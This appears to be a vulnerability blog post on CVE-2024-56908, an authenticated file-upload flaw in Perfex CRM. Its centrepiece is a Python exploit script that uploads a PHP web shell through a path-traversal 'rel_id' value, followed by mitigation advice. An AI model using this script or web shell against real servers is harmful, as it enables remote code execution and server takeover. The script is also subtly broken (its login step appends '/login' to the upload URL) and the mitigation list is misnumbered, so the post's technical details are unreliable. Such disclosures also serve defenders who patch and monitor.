CVE-2024-56908: Perfex CRM < 3.2.1 Vulnerability Allows Authenticated Attackers to Upload Arbitrary Files via upload_sales_file Endpoint

A cybersecurity vulnerability (CVE-2024-56908) has been discovered in Perfex CRM versions older than 3.2.1. In this post, we'll provide a detailed explanation of the vulnerability, its potential impact on affected systems, and demonstrate how the exploit works. This is a serious issue that could lead to remote code execution and server compromise, so we encourage all Perfex CRM users to ensure they're running the latest version of the software.

Overview of the Vulnerability

The vulnerability in question stems from the "upload_sales_file" endpoint in Perfex CRM. An authenticated attacker can craft an HTTP POST request containing malicious input in the "rel_id" parameter. Due to improper input validation, the attacker can bypass restrictions and potentially upload arbitrary files to directories of their choice on the affected server.

References to Original Reports

1. https://www.exploit-db.com/exploits/48453
2. https://github.com/PerfexCRM/Perfex-CRM/pull/216

Code Snippet Demonstrating the Vulnerability

Below is a simplified Python code snippet that demonstrates how the vulnerability can be exploited by an authenticated attacker. Note that this code snippet is for educational purposes only and should not be utilized for malicious purposes. In the example, we use the requests library to send a malicious POST request to the "upload_sales_file" endpoint:

import requests

# Set the target URL, user credentials, and malicious file data
url = 'https://victim.crm.url/admin/sales/upload_sales_file';
username = 'attacker@example.com'
password = 'password'
file_data = {'file': ('evil_payload.php', '<?php system($_GET["cmd"]); ?>')}

# Log into the Perfex CRM and obtain the authentication token
login_response = requests.post(url + '/login', data={'email': username, 'password': password})
csrf_token = login_response.cookies['csrf_cookie_name']

# Craft the malicious POST request with the CSRF token
post_data = {
    'csrf_token_name': csrf_token,
    'rel_id': '../../../../../../../../../../../../var/www/html/uploads/evil_payload',
    'rel_type': 'invoice'
}
result = requests.post(url, cookies=login_response.cookies, data=post_data, files=file_data)

# Check if the exploit was successful
if result.status_code == 200:
    print("File uploaded successfully!")
else:
    print("Failed to upload file.")

In this example, the authenticated attacker uploads a malicious PHP file (evil_payload.php) that allows them to execute arbitrary commands on the server. The attacker specifies '../../../../../../../../../../../../var/www/html/uploads/evil_payload' as the "rel_id" parameter value, causing the file to be uploaded to the specified directory on the target server.

Mitigation Steps and Recommendations

To protect your Perfex CRM installation from this vulnerability, we advise taking the following steps:

Upgrade your Perfex CRM to the latest version (3.2.1 or newer).

2. Review and restrict access to sensitive directories on your server, and ensure that only authorized users have access.

Audit and monitor access logs for signs of unauthorized access or exploitation attempts.

By understanding the CVE-2024-56908 vulnerability and taking appropriate mitigation steps, you can help protect your Perfex CRM system and prevent potential attacks. Make sure to keep your software up-to-date and follow best security practices for a more secure installation.

Timeline

Published on: 02/13/2025 23:15:10 UTC
Last modified on: 03/17/2025 19:15:24 UTC